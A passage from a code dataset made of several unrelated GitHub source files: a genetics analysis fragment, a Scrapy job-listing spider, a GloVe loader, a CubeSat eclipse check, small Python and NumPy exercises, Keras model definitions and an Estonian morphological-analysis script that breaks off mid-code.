calculate loo rates\nif args.m2:\n bots_25 = 2.0/(dat_burn['eoo_pre_l'] + dat_burn['eoo_post_l'] + dat_burn['som_l'] + 25*dat_burn['loo_l']).values\n bots_34 = 2.0/(dat_burn['eoo_pre_l'] + dat_burn['eoo_post_l'] + dat_burn['som_l'] + 34*dat_burn['loo_l']).values\nelse:\n bots_25 = (2.0/(2.0/dat_burn['eoo_l'] + \n dat_burn['som_l'] + 25*dat_burn['loo_l'])).values\n bots_34 = (2.0/(2.0/dat_burn['eoo_l'] + \n dat_burn['som_l'] + 34*dat_burn['loo_l'])).values\nrates = (bots_34-bots_25)/(34-25)\n\n# calculate bottlenecks for fblo_l and f_buc_l\nbots_fblo = 2.0/dat_burn['fblo_l'].values\nbots_fbuc = 2.0/dat_burn['fbuc_l'].values\n\n# frac post-fert\nfracpf = dat_burn['som_l'].values / (2.0/bots_mean)\n\ncolumns = ['map', 'mean', 'median', 'ci05', 'ci95']\n\nlls = dat_burn['ll'].values\ndat_dict = OrderedDict()\n\n# now get summaries\nfor col in list(dat.columns):\n if col == 'll':\n continue\n dat_dict[col] = get_summary(dat_burn[col].values, lls)\ndat_dict['bots_mean'] = get_summary(bots_mean, lls)\ndat_dict['bots_18'] = get_summary(bots_18, lls)\ndat_dict['bots_40'] = get_summary(bots_40, lls)\ndat_dict['bot_fblo'] = get_summary(bots_fblo, lls)\ndat_dict['bot_fbuc'] = get_summary(bots_fbuc, lls)\ndat_dict['loo_rate'] = get_summary(rates, lls)\ndat_dict['fracpf'] = get_summary(fracpf, lls)\n\n# print output\noutdat = pd.DataFrame.from_dict(dat_dict, orient = 'index')\noutdat.columns = columns\n\noutdat.to_csv(sys.stdout, index_label = 'var', sep = '\\t')\n","repo_name":"ammodramus/mope","sub_path":"examples/do_analysis.py","file_name":"do_analysis.py","file_ext":"py","file_size_in_byte":6087,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"30610555605","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport json\nimport requests\nfrom requests import ConnectionError, HTTPError, Timeout\nfrom urllib import urlencode, quote\nfrom jobpic.items import IthotItem\nfrom scrapy.loader import ItemLoader\nfrom scrapy import log\n\nclass JobpicSpider(scrapy.Spider):\n name = \"jobpic\"\n allowed_domains = [\"lagou.com\"]\n start_urls = (\n 'http://www.lagou.com',\n )\n\n cities = []\n\n def __init__(self, category=None, *args, **kwargs):\n for city in open('city.txt', 'r'):\n self.cities.append(city.strip())\n\n def parse(self, response):\n xp = '//*[@id=\"sidebar\"]/div[1]/div/div/dl/dd/a/text()'\n\n for sel in response.xpath(xp).extract():\n item=IthotItem()\n kd = quote(sel.encode('utf-8'))\n\n for city in self.cities:\n for result in self._get_jobs(city, kd):\n for item in result:\n pd = item['positionId']\n item['kd'] = kd\n\n job_url = 'http://www.lagou.com/jobs/' + str(pd) + '.html'\n yield scrapy.Request(url=job_url, meta = item,\n callback=self.parse_detail, errback=self._err_process)\n\n\n def _get_jobs(self, city, kd):\n data = {'first':'false', 'pn':None, 'kd':kd}\n url = 'http://www.lagou.com/jobs/positionAjax.json?city=' + city\n page = 0\n totalpage = 1\n\n while page <= totalpage:\n page += 1\n data['pn'] = page\n\n #try:\n r = requests.post(url, data)\n #except ConnectionError, HTTPError, Timeout:\n # log.msg('send request for get detail error', level=log.ERROR)\n\n result = json.loads(r.text.encode('utf-8'))['content']['result']\n if not totalpage:\n totalpage = json.loads(r.text.encode('utf-8'))['content']['totalPageCount']\n\n yield result\n\n def _err_process(self):\n log.msg('send request for get detail error', level=log.ERROR)\n\n def parse_detail(self, response):\n\n pd = response.meta['positionId']\n kd = 
response.meta['kd']\n l = ItemLoader(item=IthotItem(), response=response)\n l.add_xpath('salary', '//*[@id=\"job_detail\"]/dd[1]/p[1]/span[1]/text()')\n l.add_xpath('local', '//*[@id=\"job_detail\"]/dd[1]/p[1]/span[2]/text()')\n\n l.add_xpath('years', '//*[@id=\"job_detail\"]/dd[1]/p[1]/span[3]/text()')\n l.add_xpath('edu', '//*[@id=\"job_detail\"]/dd[1]/p[1]/span[4]/text()')\n l.add_xpath('detail', '//*[@id=\"job_detail\"]/dd[2]/p/text()')\n l.add_xpath('detail', '//*[@id=\"job_detail\"]/dd[2]/p/span/text()')\n l.add_xpath('detail', '//*[@id=\"job_detail\"]/dd[2]/ul/li/text()')\n l.add_xpath('detail', '//*[@id=\"job_detail\"]/dd[2]/ul/li/p/text()')\n l.add_value('pd', pd)\n l.add_value('kd', kd)\n\n return l.load_item()\n","repo_name":"renyunfei/jobpic","sub_path":"jobpic/spiders/hot.py","file_name":"hot.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7614264850","text":"import numpy as np\r\nfrom tqdm import tqdm\r\n\r\nclass GloVe:\r\n\tdef __init__(self):\r\n\t\tself.model_path = './glove/glove.6B.100d.txt'\r\n\t\tself.embeddings_index = None\r\n\t\tself.initialize_glove()\r\n\r\n\tdef initialize_glove(self):\r\n\t\tself.embeddings_index = {}\r\n\t\twith open(self.model_path, encoding=\"utf8\") as f:\r\n\t\t\tfor line in tqdm(f, total=400000, desc='Extracting GloVe Embeddings'):\r\n\t\t\t\tvalues = line.split();\r\n\t\t\t\tword = values[0];\r\n\t\t\t\tcoefs = np.asarray(values[1:], dtype='float32');\r\n\t\t\t\tself.embeddings_index[word] = coefs;\r\n\r\n\tdef glove_extract(self, tag):\r\n\t\tembeddings = []\r\n\t\tfor w in tag.split():\r\n\t\t\ttry:\r\n\t\t\t\tembeddings.append(self.embeddings_index[w])\r\n\t\t\texcept:\r\n\t\t\t\tpass\r\n\t\tif len(embeddings) == 0:\r\n\t\t\tembeddings = np.zeros((1, 100))\r\n\t\treturn np.array(embeddings)","repo_name":"AmanPriyanshu/EDCCT-Embedders-for-Deep-Contextual-Clustering-of-Tags","sub_path":"glove_embed.py","file_name":"glove_embed.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73427614965","text":"import numpy as np\nimport math\n\n# determine if cubesat is in eclipse\n# Re = radius of Earth in m\nRe = 6371000\n\n\ndef inEclipse(scx, scy, scz, sx, sy, sz):\n # find magnitude of spacecraft position vector\n # vector found from previous file code 2.2.1\n SpacecraftPosition = np.array([scx, scy, scz])\n Rsc = np.linalg.norm(SpacecraftPosition)\n print('Rsc', Rsc)\n\n # find magnitude of sun position vector\n SunPosition = np.array([sx, sy, sz])\n Rs = np.linalg.norm(SunPosition)\n print('Rs', Rs)\n\n # calculate the two angles that define the transition point from sun to shade\n input1 = Re / Rsc\n input2 = Re / Rs\n\n theta1 = math.acos(input1)\n theta2 = math.acos(input2)\n\n thetaTotal = theta1 + theta2\n\n # calculate the angle between the spacecraft's actual position vector and the sun's position vector\n thetaActual = math.acos((np.dot(SpacecraftPosition, SunPosition)) / (Rsc * Rs))\n\n print(f'thetaActual = {thetaActual}, thetaTotal: {thetaTotal}')\n\n return thetaActual > thetaTotal\n","repo_name":"connie-liou/STAR-Thermal","sub_path":"EclipseAngle.py","file_name":"EclipseAngle.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"70970590967","text":"\"\"\"\nNaloga: \nPodan imate dataset učencev in njihovih ocen.\nS 
pomočjo list comprehensions ustvarite nov list v katerem so samo imena učencev, ki so opravili izpit (ocena more biti večja ali enaka 55).\n\nPrimeri:\n\nInput:\nstudents = [ [\"Ana\", 55], [\"Anže\", 96], [\"Andrej\", 67], [\"Bojan\", 88], [\"Črt\", 100], [\"Dajana\", 49], [\"Erika\", 79], [\"Francis\", 11] ]\n\nOutput:\n['Ana', 'Anže', 'Andrej', 'Bojan', 'Črt', 'Erika']\n\"\"\"\nstudents = [\n [\"Ana\", 55],\n [\"Anže\", 96],\n [\"Andrej\", 67],\n [\"Bojan\", 88],\n [\"Črt\", 100],\n [\"Dajana\", 49],\n [\"Erika\", 79],\n [\"Francis\", 11],\n]\n\nopravili = [key for key, value in students if value >= 55]\nprint(opravili)\n","repo_name":"Yachara/ICTA_Python_Osnovni_public","sub_path":"Termin_05/DN_05/DN05_03.py","file_name":"DN05_03.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30898920921","text":"import numpy as np\n\na = np.array([0.1, 0.2, 0.3])\na.dtype = np.int8()\nprint(a, a.size)\nprint(a.itemsize) # сколько байт занимет один элемент\n\nb = np.ones((3,4,5))\nprint(b.ndim) # колитчество осей\nprint(b.shape) # количество элементов по каждой оси\nb.shape = 12, 5\nprint(b)\nc = b.reshape(3,2,10) # она не создаёт нового массива, а создаёт другое представление тех же данных\nprint(c)\nd = b.T # трансопинование\nprint(d)\n# массивы и их представления это разные понятия\n\na = np.array([1,2,3,4,5,6,7,8,9])\nb = a.view() # копия представления\na.shape = 3,3 \nprint(b)\n\na = np.array([1,2,3,4,5,6,7,8,9])\nb = a.copy() # копия данных массива","repo_name":"RavenDenster/base-numPy-selfedu","sub_path":"features-performance-array.py","file_name":"features-performance-array.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39025741791","text":"from keras.models import Model\r\nfrom keras import layers\r\n\r\n\r\ndef my_model_simple(input_length=1024):\r\n # basit bir model tanımlaması yapalım shape ile katmanlara bir şekil, dtype ile veri türü ileterek bu modelin bir gözlem için ne tür verileri kabul edeceğini belirtiyoruz \r\n input = layers.Input(shape=(input_length,), dtype='float32')\r\n#dense keras modellerini geliştirirken kullanacağınız en yaygın katman türüdür.\r\n# dense iki argüman alır. 513 nöron istediğmizi belirtmek için units ve bu nöronların düzeltilmiş doğrusal birim(ReLU) nöronlar olmasını istediğimizi belirtmek için activiation=relu alır.\r\n\r\n middle = layers.Dense(units=512, activation='relu')(input)\r\n#burada densenin outputunu tanımlıyoruz burada tek bir nöron alır. ve bir sigmoid aktivasyonunu alır. bu çok sayıda veriyi 0 ile 1 arasındaki tek bir skorda birleştirmek için harikadır. \r\n# çıktı katmanı, girdi olarak nesne, orta katmanımızda ki 512 nöronmuzun çıktılarının hepsinin bu nörona gönderilmesi gerektiğini bildirir.\r\n output = layers.Dense(units=1, activation='sigmoid')(middle)\r\n\r\n model = Model(inputs=input, outputs=output)\r\n #en sonda modeli derleriz. optimizer kullanılacak geri yayılım algoritmasının türünü belirtir.\r\n #loss parametresi eğitim süreci sırasında en aza indirilen şeyi belirtir. 
\r\n #metric eğitim sırasında ve sonrasında model performansını analiz ederken kerasın raporlamasını istediğiniz metriklerin bir listesini iletebilirsiniz.\r\n model.compile(optimizer='adam',\r\n loss='binary_crossentropy',\r\n metrics=['accuracy'])\r\n return model\r\n#tam bu noktada bu fonksyionu görmek için model.summary()ile oluşturulan modeli görebilirsin.\r\n\r\n\r\ndef my_model(input_length=1024):\r\n # Note that we can name any layer by passing it a \"name\" argument.\r\n input = layers.Input(shape=(input_length,), dtype='float32', name='input')\r\n\r\n # We stack a deep densely-connected network on tops\r\n x = layers.Dense(1024, activation='relu')(input)\r\n x = layers.normalization.BatchNormalization()(x)\r\n x = layers.Dense(512, activation='relu')(x)\r\n x = layers.normalization.BatchNormalization()(x)\r\n x = layers.Dense(64, activation='relu')(x)\r\n x = layers.normalization.BatchNormalization()(x)\r\n\r\n # And finally we add the last (logistic regression) layer:\r\n output = layers.Dense(1, activation='sigmoid', name='output')(x)\r\n\r\n model = Model(inputs=input, outputs=output)\r\n model.compile(optimizer='adam',\r\n loss='binary_crossentropy',\r\n metrics=['accuracy'])\r\n return model\r\n\r\n\r\nif __name__ == '__main__':\r\n simple_model = my_model_simple(1024)\r\n model = my_model(1024)\r\n print(simple_model.summary())","repo_name":"sinemsahn/yenibitirmeprojesi","sub_path":"bitirme/model_arcitecture.py","file_name":"model_arcitecture.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"42681597047","text":"# -*- coding: utf-8 -*-\n\n\n#leidub osalauses esineb kindla morfanalüüsiga sõna\n#cm+:_V_ aux clause_morf+:\n#cl+:koer clause_lemma+:koer\n\n\n#Supported input format XML-like format as shown below:\n\n\n\n#Output format inforem\n\n######## libraries ########\nfrom __future__ import print_function\n\nimport os\nimport re\nimport sys\nimport codecs\n\n\n#############################################\n# common functions\n#############################################\ndef isPythonVersion(version):\n\tif float(sys.version[:3]) == version:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef make_sure_path_exists(path):\n\timport errno\n\ttry:\n\t\tos.makedirs(path)\n\texcept NameError as exception:\n\t\tprint('here')\n\texcept OSError as exception:\n\t\tif exception.errno != errno.EEXIST:\n\t\t\traise\n\t\t\n\t\t\ndef eprint(*args, **kwargs):\n\tprint(*args, file=sys.stderr, **kwargs)\n\n\n\nclass bColors:\n\tcolors1 = (\n\t\t'\\033[1;31m', '\\033[1;32m', '\\033[1;33m', '\\033[1;34m', '\\033[1;35m', '\\033[1;36m', '\\033[1;37m', '\\033[1;38m',\n\t\t'\\033[1;39m'\n\t)\n\n\tstyle = {\n\t\t'bold': '\\033[1m'\n\t\t, 'red': '\\033[1;31m'\n\t\t, 'green': '\\033[0;32m'\n\t\t, 'yellow': '\\033[0;33m'\n\t\t, 'blue': '\\033[0;34m'\n\t\t, 'endc': '\\033[0m'\n\t}\n\tpattern_red = style['red'] + '%s' + style['endc']\n\tpattern_yellow = style['yellow'] + '%s' + style['endc']\n\tpattern_green = style['green'] + '%s' + style['endc']\n\tpattern_blue = style['blue'] + '%s' + style['endc']\n\tpattern_bold = style['bold'] + '%s' + style['endc']\n\n\tENDC = '\\033[0m'\n\tBOLD = '\\033[1m'\n\tUNDERLINE = '\\033[4m'\n\n\nif __name__ == '__main__':\n\tif sys.stdout.encoding is None:\n\t\teprint(\n\t\t\tbColors.pattern_red % \"please set python env PYTHONIOENCODING=UTF-8, example: export PYTHONIOENCODING=UTF-8, when write to stdout.\")\n\t\texit(1)\n\t\t\n\n\ndef path_leaf(path):\n\timport 
ntpath\n\thead, tail = ntpath.split(path)\n\treturn tail or ntpath.basename(head)\n\n\n################################\n# dictionary functions and global variables\n#############################\n\n######## dictonary functions ########\n\n\n\ndef read_parse_dict(dictname, dict={}):\n\t\n\tglobal global_conf\n\ttry:\n\t\tf_tsv_dict = codecs.open(dictname, \"r\", \"utf-8\")\n\texcept IOError:\n\t\teprint(bColors.pattern_red % ('Cannot open %s' % dictname))\n\t\texit()\n\t\t\n\tdict_rows_count=0\n\twith f_tsv_dict as tsv:\n\t\tfor line in tsv:\n\t\t\tline = line.strip()\n\t\t\trow = line.split(\"\\t\")\n\t\t\tif len(row)>=2:\n\t\t\t\tif row[1]!='0':\n\t\t\t\t\tdict_rows_count += 1\n\t\t\t\t\tdict_record={}\n\t\t\t\t\tif not row[0].lower() in dict:\n\t\t\t\t\t\tdict[row[0].lower()]=[]\n\t\t\t\t\tdict_record['morf'] = row[1]\n\t\t\t\t\tdict_record['rules'] = []\n\t\t\t\t\ti=2\n\t\t\t\t\twhile i 0:\n\t\t\t\t\t\t\t\t\t\tsub_weigth = sub_sub_weigth\n\t\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tif sub_weigth == 0:\n\t\t\t\t\t\t\t\t\trule_total_weight = 0\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\trule_total_weight += sub_weigth\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\telif ruletype[-9:] == '_gramcat-':\n\t\t\t\t\t\t\t\tsub_weigth = dict_weight[ruletype]\n\t\t\t\t\t\t\t\t#eprint('rule',rule_strings)\n\t\t\t\t\t\t\t\t#eprint ('text',strings_to_compare)\n\t\t\t\t\t\t\t\tfor text_string in strings_to_compare:\n\t\t\t\t\t\t\t\t\tarray_gramcats = text_string.lower().split(' ')\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tif set(rule_strings) < set(array_gramcats):\n\t\t\t\t\t\t\t\t\t\tsub_weigth = 0\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tif sub_weigth == 0:\n\t\t\t\t\t\t\t\t\t\trule_total_weight = 0\n\t\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\trule_total_weight += sub_weigth\n\t\t\t\t\t\t\t\t\n\n\t\t\t\t\t\t\t#morf and lemma rules\n\t\t\t\t\t\t\telif ruletype[-1:] == '+': #reegel, et string leidub\n\t\t\t\t\t\t\t\tsub_weigth = 0\n\t\t\t\t\t\t\t\tfor text_string in strings_to_compare:\n\t\t\t\t\t\t\t\t\tfor rule_string in rule_strings:\n\t\t\t\t\t\t\t\t\t\tif text_string == rule_string:\n\t\t\t\t\t\t\t\t\t\t\tsub_weigth = dict_weight[ruletype]\n\t\t\t\t\t\t\t\t\t\t\t#print ('leidus')\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\tif sub_weigth == 0:\n\t\t\t\t\t\t\t\t\trule_total_weight = 0\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\trule_total_weight += sub_weigth\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\telif ruletype[-1:] == '-':\n\t\t\t\t\t\t\t\tsub_weigth = dict_weight[ruletype]\n\t\t\t\t\t\t\t\tfor text_string in strings_to_compare:\n\t\t\t\t\t\t\t\t\tfor rule_string in rule_strings:\n\t\t\t\t\t\t\t\t\t\tif text_string == rule_string:\n\t\t\t\t\t\t\t\t\t\t\tsub_weigth = 0\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\tif sub_weigth == 0:\n\t\t\t\t\t\t\t\t\trule_total_weight = 0\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\trule_total_weight += sub_weigth\n\t\t\t\t\t\t\t\t\n\n\t\t\t\t\t\tif rule_total_weight > 0:\n\t\t\t\t\t\t\tmatched_rules[rule_total_weight] = rulemorf\n\n\n\t\t\t\t#print (matched_rules)\n\t\t\t\t#print (morf)\n\t\t\t\t#kui üksi reegel ei sobinud\n\t\t\t\t\n\t\t\t\tif not matched_rules:\n\t\t\t\t\tmissing_morf[morf_orig] = 1\n\n\t\t\t\telse:\n\t\t\t\t\tsentence_dict['lines'][lineid]['info']['analys']['morf'][i] = matched_rules[(max(matched_rules.keys(), key=int))]\n\t\n\n\n\treturn sentence_dict\n\n\n######################################\n# inforem output functions\n####################################\n\ndef construct_inforem_sentence(sentence, sentence_id):\n\tglobal 
global_conf\n\tflags = global_conf['conf']['flags']\n\tsentence_str = ''\n\tif not '1' in flags:\n\t\tsentence_str = \"\\\"\\\"\\n\\n\" % sentence_id\n\tfor line_id in sorted(sentence['lines']):\n\t\tif g_d_sentence['lines'][line_id]['type'] == 'token':\n\t\t\tsentence_str += construct_line_inforem(sentence['lines'][line_id]['info']) + \"\\n\"\n\tif not '1' in flags:\n\t\tsentence_str += '\"\"' + \"\\n\" + \"\\n\"\n\treturn sentence_str\n\n\ndef construct_line_inforem(dict_info):\n\n\n\treturn_line_pattern = '\"<%s>\"%s'\n\tmorf_pattern1 = \"\\n\\t\" + '\"%s\" L%s %s%s%s%s%s%s'\n\tmorf_pattern2 = \"\\n\\t\" + '\"%s\" %s %s%s%s%s%s'\n\tfunction_pattern = ' %s'\n\trelation_pattern = ' #%s'\n\n\tpattern_synt_rel = ' {%s:%s}'\n\n\tpattern_synt_type = ' {%s}'\n\tpattern_pos = '%s '\n\tsynt_relations = ''\n\tif 'ann_relations' in dict_info:\n\t\t# synt_relations = dict_info['ann_relations']\n\t\tfor rel in dict_info['ann_relations']:\n\t\t\tsynt_relations += (pattern_synt_rel % (rel, ','.join(dict_info['ann_relations'][rel])))\n\n\tsynt_type = ''\n\tif 'ann_type' in dict_info:\n\t\tsynt_type = pattern_synt_type % dict_info['ann_type']\n\tstr_morf = ''\n\n\tfor i, v in enumerate(dict_info['analys']['lemma']):\n\t\tlemma = v\n\t\tmorf = dict_info['analys']['morf'][i]\n\t\tcase = dict_info['analys']['case'][i]\n\t\tpos = dict_info['analys']['pos'][i]\n\t\tfunctions = ''\n\t\trelations = ''\n\n\t\tif dict_info['analys']['function'][i] != '':\n\t\t\tfunctions = function_pattern % (dict_info['analys']['function'][i])\n\t\tif dict_info['analys']['relation'][i] != '':\n\t\t\trelations = relation_pattern % (dict_info['analys']['relation'][i])\n\t\tif pos:\n\t\t\tpos = pattern_pos % pos\n\t\tif case != '':\n\t\t\tstr_morf = str_morf + (morf_pattern1 % (lemma, case, pos, morf, functions, relations, synt_type, synt_relations))\n\t\telse:\n\t\t\tstr_morf = str_morf + (morf_pattern2 % (lemma, pos, morf, functions, relations, synt_type, synt_relations))\n\t\tstr_morf = str_morf.replace(' ',' ')\n\n\treturn return_line_pattern % (dict_info['token'], str_morf)\n\n\n##################################\n# estmorf input parse functions\n#################################\n\ndef new_clause_id():\n\t\"\"\"\n\n\t:rtype: int\n\t\"\"\"\n\tglobal g_d_sentence\n\tif 'clauseTokens' in g_d_sentence:\n\t\tnewKey = max(g_d_sentence['clauseTokens'].keys()) + 1\n\t\tg_d_sentence['clauseTokens'][newKey] = []\n\n\t\treturn newKey\n\telse:\n\t\tg_d_sentence['clauseTokens'] = {}\n\t\tg_d_sentence['clauseParent'] = {}\n\t\tg_d_sentence['clauseTokens'][1] = []\n\t\tg_d_sentence['clauseParent'][1] = 0\n\t\treturn 1\n\ndef parseTokenLineToDict(line):\n\t#siia lisada range stringi formaadi check ja vastav info stdERRORisse\n\t#Seoses Seos+s //_H_ Sg Ine, // Seose+s //_H_ Sg Ine, // Seoses+0 //_H_ Sg Nom, // seos+s //_S_ Sg Ine, // seoses+0 //_K_ //\n\tglobal g_input_line_nr\n\tdict={}\n\terrors = []\n\tline=line.strip()\n\t#ignore empty lines\n\t#print (line)\n\tif line != '':\n\t\tresult = re.match('(^[^\\s+]+)', line)\n\t\tdict['token'] = result.group(0)\n\t\tresult = re.split('\\s//\\s*', line)\n\t\t#print (result);\n\t\tif len(result)>1:\n\t\t\tresult2 =re.split('\\s+', result[0])\n\t\t\tif len(result2)==2:\n\t\t\t\t#print (result2)\n\t\t\t\tdict['token'] = result2[0].strip()\n\t\t\t\tstr = 
result2[1].strip()\n\n\t\t\t\tdict['analys']={}\n\t\t\t\tdict['analys']['lemma']=[]\n\t\t\t\tdict['analys']['case']=[]\n\t\t\t\tdict['analys']['morf']=[]\n\t\t\t\tdict['analys']['pos']=[]\n\t\t\t\tdict['analys']['function']=[]\n\t\t\t\tdict['analys']['relation']=[]\n\n\n\t\t\t\tresult = re.findall('\\s\\s\\s\\s.+\\s\\/\\/.+\\/\\/', line)\n\t\t\t\tif len(result) < 1:\n\t\t\t\t\terrors.append((bColors.pattern_red % ('\\tUnrecognized format on line %d: ' % g_input_line_nr)) + line)\n\t\t\t\t#print (result\n\t\t\t\tfor i,v in enumerate(result):\n\t\t\t\t\tres = re.split(' //', v)\n\t\t\t\t\tdict['analys']['pos'].append('')\n\t\t\t\t\tlemmacase = re.split('\\+', res[0].strip())\n\t\t\t\t\t# print (lemmacase)\n\t\t\t\t\tdict['analys']['lemma'].append(lemmacase[0].strip())\n\t\t\t\t\tif (len(lemmacase)>1):\n\t\t\t\t\t\tdict['analys']['case'].append(lemmacase[1].strip())\n\t\t\t\t\telse:\n\t\t\t\t\t\tdict['analys']['case'].append('')\n\t\t\t\t\tdict['analys']['morf'].append(res[1].strip().replace(',',''))\n\t\t\t\t\tdict['analys']['function'].append('')\n\t\t\t\t\tdict['analys']['relation'].append('')\n\n\t\t\telse:\n\t\t\t\tdict['analys'] = {}\n\t\t\t\tdict['analys']['lemma'] = []\n\t\t\t\tdict['analys']['case'] = []\n\t\t\t\tdict['analys']['morf'] = []\n\t\t\t\tdict['analys']['pos'] = []\n\t\t\t\tdict['analys']['function'] = []\n\t\t\t\tdict['analys']['relation'] = []\n\t\t\t\tdict['analys']['function'].append('')\n\t\t\t\tdict['analys']['relation'].append('')\n\t\t\t\tdict['analys']['pos'].append('')\n\t\t\t\tdict['analys']['lemma'].append('ERROR!!! '+line)\n\t\t\t\tdict['analys']['case'].append('')\n\t\t\t\tdict['analys']['morf'].append(line)\n\t\t\t\terrors.append((bColors.pattern_red % ('\\tUnrecognized format on line %d: ' % g_input_line_nr)) + line)\n\n\n\t\telse:\n\t\t\tdict['analys'] = {}\n\t\t\tdict['analys']['lemma'] = []\n\t\t\tdict['analys']['case'] = []\n\t\t\tdict['analys']['morf'] = []\n\t\t\tdict['analys']['pos'] = []\n\t\t\tdict['analys']['function'] = []\n\t\t\tdict['analys']['relation'] = []\n\t\t\tdict['analys']['lemma'].append('ERROR!!! '+line)\n\t\t\tdict['analys']['case'].append('')\n\t\t\tdict['analys']['function'].append('')\n\t\t\tdict['analys']['relation'].append('')\n\t\t\tdict['analys']['pos'].append('')\n\t\t\tdict['analys']['morf'].append(line)\n\t\t\terrors.append((bColors.pattern_red % ('\\tUnrecognized format on line %d: ' % g_input_line_nr)) + line)\n\tif len(errors):\n\t\teprint()\n\tfor error in errors:\n\t\teprint (bColors.pattern_red % ('\\t%s'%error))\n\t\t#pp.pprint(dict)\n\n\treturn (dict)\n\ndef makeDictFromArray(aSentence, i=None):\n\t# sentence_dict['lines'][lineid]['type'] == 'token'\n\t# dict['analys']={}\n\t# dict['analys']['lemma']=[]\n\t# dict['analys']['case']=[]\n\t# dict['analys']['morf']=[]\n\t# dict['analys']['lemma'].append('ERROR!!! '+line)\n\t# dict['analys']['case'].append('')\n\t# dict['analys']['morf'].append(line)\n\n\t#\n\t#Õigupoolest õigu_poolest+0 //_D_ //\n\t#tuli tule+i //_V_ Pers Prt Ind Sg3 Aff, //\n\t#kell kell+0 //_S_ Sg Nom, //\n\t#12:08 12:08+0 //_N_ ?, //\n\t#ka ka+0 //_D_ //\n\t#teade teade+0 //_S_ Sg Nom, //\n\t#, , //_Z_ //\n\t#\n\t#et et+0 //_J_ //\n\t#m-parkimine m-parkimine+0 //_S_ Sg Nom, //\n\t#ei ei+0 //_V_ Neg, //\n\t#toimi toimi+0 //_V_ Pers Prs Ind Neg, //\n\t#... ... 
//_Z_ //\n\t#\n\t#aga aga+0 //_J_ //\n\t#selleks see+ks //_P_ Sg Tra, //\n\t#ajaks aeg+ks //_S_ Sg Tra, //\n\t#teadsin tead+sin //_V_ Pers Prt Ind Sg1 Aff, //\n\t#ma mina+0 //_P_ Sg Nom, //\n\t#seda see+da //_P_ Sg Par, //\n\t#isegi isegi+0 //_D_ //\n\t#. . //_Z_ //\n\t#\n\n\tglobal g_d_sentence\n\tglobal g_input_line_nr\n\n\n\tg_d_sentence = {'lines':{}}\n\tline_id = 0\n\t#g_token_id = 0\n\n\tlevel = 1\n\n\n\tclause_id = new_clause_id()\n\n\tparent_clause = g_d_sentence['clauseParent'][clause_id]\n\t#g_d_sentence['clauseParent'][g_clause_id] = parent_clause\n\n\n\ttag_line_pattern = '^<(.+)>$'\n\n\t#token_line_pattern = '^(.+)\\s\\s\\s\\s((.+) //(.+) //\\s*)+$'\n\tline_id = 0\n\n\tfor s in aSentence:\n\n\t\t# print (s)\n\t\tline_id += 1\n\t\tmatch_tag = re.match(tag_line_pattern, s)\n\t\t#match_tokenline = re.match(token_line_pattern, s)\n\n\t\tif match_tag:\n\n\t\t\t#print (match_tag.groups())\n\t\t\ttag = s\n\t\t\tif match_tag.group(1) == 'kindel_piir/':\n\t\t\t\t#parent sama\n\t\t\t\t#clause uus\n\t\t\t\tclause_id = new_clause_id()\n\t\t\t\tg_d_sentence['clauseParent'][clause_id] = parent_clause\n\t\t\t\tg_d_sentence['lines'][line_id] = { 'type':'tag', 'line_id':line_id, 'tag': tag, 'level' : level}\n\n\t\t\telif match_tag.group(1) == 'kiil':\n\t\t\t\t#parent eelmine clause\n\t\t\t\t#clause uus\n\t\t\t\tparent_clause = clause_id\n\t\t\t\tclause_id = new_clause_id()\n\t\t\t\tg_d_sentence['clauseParent'][clause_id] = parent_clause\n\t\t\t\tlevel += 1\n\t\t\t\tg_d_sentence['lines'][line_id] = { 'type':'tag', 'line_id':line_id, 'tag': tag, 'level' : level}\n\n\n\t\t\telif match_tag.group(1) == '/kiil':\n\t\t\t\t# parentclause parent\n\t\t\t\t# clause eelmine clause\n\t\t\t\tg_d_sentence['lines'][line_id] = { 'type':'tag', 'line_id':line_id, 'tag': tag, 'level' : level}\n\t\t\t\tlevel -= 1\n\t\t\t\tclause_id = g_d_sentence['clauseParent'][clause_id]\n\t\t\t\tparent_clause = g_d_sentence['clauseParent'][clause_id]\n\n\t\t\t#print (clause_id, parent_clause, '-'*4*g_d_sentence['lines'][line_id]['level'], s)\n\n\t\telse:\n\t\t\t#print (clause_id, parent_clause, '-'*4*level, s)\n\n\t\t\tinfo = parseTokenLineToDict(s)\n\t\t\tg_d_sentence['lines'][line_id] = { 'type':'token', 'line_id':line_id, 'token': s, 'clause_id':clause_id, 'level' : level, 'info':info}\n\t\t\tg_d_sentence['clauseTokens'][clause_id].append(line_id)\n\t\t\t#print (info)\n\n\t\ndef translate(f_input, f_out):\n\t#global variables\n\tglobal g_d_sentence\n\tglobal g_input_line_nr\n\tglobal missing_morf\n\tglobal global_conf\n\tflags = global_conf['conf']['flags']\n\n\ttag_line_pattern = 